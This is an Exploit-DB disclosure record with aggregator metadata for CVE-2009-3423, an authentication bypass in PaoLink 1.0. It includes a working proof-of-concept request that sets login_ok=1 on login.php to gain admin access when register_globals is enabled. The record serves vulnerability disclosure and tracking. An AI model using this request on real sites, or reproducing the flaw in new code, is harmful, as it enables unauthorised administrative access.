ID EDB-ID:9292
Type exploitdb
Reporter SirGod
Modified 2009-07-28T00:00:00
Description
PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability. CVE-2009-3423. Webapps exploit for php platform
#############################################################################
[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
#############################################################################
download : http://zenas.org/paobacheca/download/scarica.html
[+] Authentication Bypass Vulnerability
- Notes : register_globals = on
- PoC :
http://127.0.0.1/[path]/login.php?login_ok=1
#############################################################################
# milw0rm.com [2009-07-28]
{"bulletinFamily": "exploit", "id": "EDB-ID:9292", "cvelist": ["CVE-2009-3423"], "modified": "2009-07-28T00:00:00", "lastseen": "2016-02-01T10:16:46", "edition": 1, "sourceData": "#############################################################################\n[+] PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability\n[+] Discovered By SirGod\n[+] http://insecurity-ro.org\n[+] http://h4cky0u.org\n#############################################################################\n\ndownload : http://zenas.org/paobacheca/download/scarica.html\n\n[+] Authentication Bypass Vulnerability\n\n\n - Notes : register_globals = on\n\n\n - PoC :\n\n http://127.0.0.1/[path]/login.php?login_ok=1\n\n#############################################################################\n\n# milw0rm.com [2009-07-28]\n", "published": "2009-07-28T00:00:00", "href": "https://www.exploit-db.com/exploits/9292/", "osvdbidlist": ["56756"], "reporter": "SirGod", "hash": "2de71cef60efacab2b7eb538e58a6975344802850e01c906d3da88ad986b907a", "title": "PaoLink 1.0 login_ok Authentication Bypass Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "PaoLink 1.0 (login_ok) Authentication Bypass Vulnerability. CVE-2009-3423. Webapps exploit for php platform", "references": [], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/9292/", "enchantments": {"vulnersScore": 4.0}}
{"result": {"cve": [{"id": "CVE-2009-3423", "type": "cve", "title": "CVE-2009-3423", "description": "login.php in Zenas PaoLink 1.0, when register_globals is enabled, allows remote attackers to bypass authentication and gain administrative access by setting the login_ok parameter to 1.", "published": "2009-09-25T18:30:16", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3423", "cvelist": ["CVE-2009-3423"], "lastseen": "2017-09-19T13:36:39"}]}}